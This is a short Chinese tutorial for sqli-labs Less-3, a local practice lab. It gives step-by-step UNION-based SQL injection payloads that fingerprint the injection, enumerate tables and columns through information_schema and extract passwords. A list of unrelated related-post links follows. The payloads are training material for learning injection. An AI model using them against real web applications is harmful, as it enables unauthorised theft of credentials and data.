Sqli-labs 3

1.按照路径http://localhost/sqli-labs/sqli-labs-master/Less-3/进入

2.判断注入类型----字符型

Payload:?id=1') and 1=1--+

注:根据报错提示的语法错误,在第一行中使用接近'union select 1,2,3--')的正确语法

3.判断注入点:2,3

Payload:id=-1') union select 1,2,3 --+

4. 根据注入点查询指定数据库名----security

Payload:id=-1') union select 1,database(),3 --+

5.查询指定数据库名下的表名

Payload:

id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

6.查询指定表----users下的字段名

Payload:

id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

7.查询指定字段名:password

Payload:

id=-1') union select 1,password,3 from emails--+

相关推荐
QD.Joker18 分钟前
日志收集工具-logstash
数据库·elk
RR13351 小时前
图标统计页面的设计与控件 Apache echarts
前端·apache·echarts
2401_836836592 小时前
mongodb数据库应用
数据库·mongodb
gs801402 小时前
机房断电后 etcd 启动失败的排查与快速恢复实录
数据库·etcd
烟雨归来3 小时前
19c补丁后oracle属主变化,导致不能识别磁盘组
数据库·oracle
厚衣服_34 小时前
第7篇:中间件全链路监控与 SQL 性能分析实践
数据库·sql·中间件
伤不起bb4 小时前
NoSQL 之 Redis 集群
数据库·redis·nosql
迷途思凡4 小时前
各数据库字段类型统计
数据库
大数据魔法师4 小时前
MongoDB(八) - MongoDB GridFS介绍及使用Python操作GridFS
数据库·python·mongodb